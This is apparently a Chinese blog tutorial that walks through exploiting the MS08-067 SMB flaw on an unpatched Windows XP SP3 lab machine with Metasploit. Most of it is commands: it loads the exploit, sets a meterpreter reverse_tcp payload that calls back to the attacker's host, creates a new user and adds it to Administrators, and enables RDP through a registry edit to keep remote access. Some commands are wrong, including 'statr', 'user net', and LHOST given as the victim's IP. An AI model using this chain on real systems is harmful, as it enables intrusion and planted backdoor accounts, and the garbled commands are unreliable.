WIN xp sp3 系统上Ms08_067_netapi漏洞利用

Ms08_067_netapi是一款Metasploit中有点老的溢出攻击载荷,攻击可以获得一个相对高的权限;

1:准备工作:WINxp sp3 系统(无补丁)
下载地址:
http://blog.csdn.net/sql_injection/article/details/47683419
攻击kali ip:192.168.243.133
靶机 ip :192.168.243.136
2:准备工作完成后开启kali打开终端metasploit中的msfconsole框架
命令 :
msfconsole
打开metasploit之前需要连接上postgresql:
service postgresql statr
3:寻找和加载 Ms08_067模块
(1):使用搜索命令搜索此模块:
search ms08_067_netapi
(2):应用搜索到的模块地址:
use exploit/windows/smb/ms08_067_netapi
4: 我们来加载一枚payload:
set payload windows/meterpreter/reverse_tcp

此时加载完毕可以查看需要设置的参数:
show options

然后如下图所示:
5:上图所示的 RHOST 为靶机的 ip, LHOST为kali 的ip:
set RHOST 被攻击者ip
set LHOST 被攻击者ip
然后进行攻击:
exploit


6:出现meterpreter命令后说明攻击成功,此时输入shell进入靶机cmd界面对其建立新的用户,并且提权:

(1):建立用户:
user net 用户名 密码 /add

(2):提权:
net localgroup administrators wmc /add




7:提权过后就可以进行远程连接登入了,但是此时要查看靶机是否打开了3389端口,因为此端口是用来进行远程连接的:
(1):查看是否打开:
netstat -na



(2):显然并没有,那么我们就给它打开: 
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
可以看到,3389端口已经打开。

8:接下来就用自己本机系统进行远程连接搞事情就可以了:
(1)打开cmd输入远程连接命令:
(2)此时计算机名输入靶机的ip地址就可以了,之后输入你自己建立的用户名和密码:

(3):就成功进入了:

此时完成所有操作。
总结:
此时靶机上也有了你创建的新用户。
要使用没有补丁的靶机,不然攻击时会失败。


评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值